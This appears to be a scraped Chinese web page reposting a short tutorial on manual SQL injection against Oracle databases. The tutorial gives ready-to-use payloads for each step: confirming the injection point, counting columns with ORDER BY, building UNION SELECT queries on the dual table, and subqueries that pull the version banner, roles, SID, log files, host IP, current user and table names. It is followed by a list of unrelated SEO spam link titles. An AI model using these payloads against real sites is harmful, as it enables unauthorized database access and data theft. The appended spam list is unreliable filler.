当前位置: 首页 > wzjs >正文

网站设计有限公司制作网页的流程

网站设计有限公司,制作网页的流程,wordpress企业站主题下载,好的建设网站公司Oracle数据库的注入比mysql较复制。 一确定注入点:与mysql一样。 and 11 -- #文章有出现. and 12 -- #文章不见了。 二。确定列数。 ’order by 1,2 -- #没问题 order by 1,2,3 -- #保错,所以有两列。 三,所有uni…

Oracle数据库的注入比mysql较复制。

一确定注入点:与mysql一样。

' and 1=1 -- +    #文章有出现.

' and 1=2 -- +    #文章不见了。

二。确定列数。

’order by 1,2 -- +    #没问题

order by 1,2,3 -- + #保错,所以有两列。

三,所有union构造注入。

这里不一样了,因为orach要构造完整的语句,但也不知道表是什么,字段是什么,所以使用null和dual(虚拟表)来替代。

' union select 'null','null' from dual --%20+

四.查询当前数据库版本。

' union select banner,'null' from sys.v_$version where rownum=1--%20+

五.语句的查询信息。

1.当前用户权限         (select * from session_roles where rownum=1)
2.当前数据库版本  (select banner from sys.v_$version where rownum=1)
3.服务器出口IP   (用utl_http.request反弹注入可以实现,下面详细操作)
4.服务器监听IP   (select utl_inaddr.get_host_address from dual where rownum=1)
5.日志文件 (select member from v$logfile where rownum=1)
6.服务器sid(当前数据库也用这个即可) (select instance_name from v$instance where rownum=1)
7.当前连接用户 (select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual where rownum=1)
8.当前用户 (select user from dual where rownum=1)
9.当前数据库名 (select table_name from user_tables where rownum=1)

查看表的基本格式如下:

' UNION SELECT 'null' , (select table_name from user_tables where rownum=1) FROM DUAL--

基本改()的内容即可。

http://www.dtcms.com/wzjs/470971.html

相关文章:

  • 网站名称重要吗品牌宣传推广方案
  • 通过网站做外贸重庆seo报价
  • 网站支付平台是怎么做的seo就业
  • 广州骏域网站建设专家网站群发软件
  • 网站导入题库怎么做的网站优化软件费用
  • 如何建立商城网站企业网站建设价格
  • 怎么样给一个网站做自然排名网站的宣传推广方式
  • 网站建设管理视频seo技术介绍
  • 建设部监理工程师考试网站本周热点新闻事件
  • 易思网站管理系统怎么推广公众号让人关注
  • 网站制作杭州淘宝关键词搜索排行榜
  • 官网排名优化seo营销技巧
  • 网站备案多久通过nba西部排名
  • 南通网站建设报价网页设计制作网站html代码大全
  • 二级域名可以做网站百度推广账户登录首页
  • 大良商城网站建设最近热搜新闻事件
  • 枣强做百度网站深圳网络推广网站推广
  • 做网站为什么需要花钱常用的网站推广方法
  • 东营seo网站建设费用优秀网站设计赏析
  • 做网站的费用 优帮云成都网站推广经理
  • 东莞做网站的学管理培训班去哪里学
  • wordpress 视频解析seo推广灰色词
  • 关于内网站建设的请示seo免费优化工具
  • 深圳网站建设招标竞价托管代运营公司
  • php建站系统哪个好哪里有学计算机培训班
  • 网站的pdf预览是怎么做的免费sem工具
  • 北京城建集团官网深圳seo优化推广
  • 现在网站建设需要多少钱网页模板之家
  • 网站需求列表百度关键词首页排名怎么上
  • 做兼职的网站贴吧网络营销郑州优化推广公司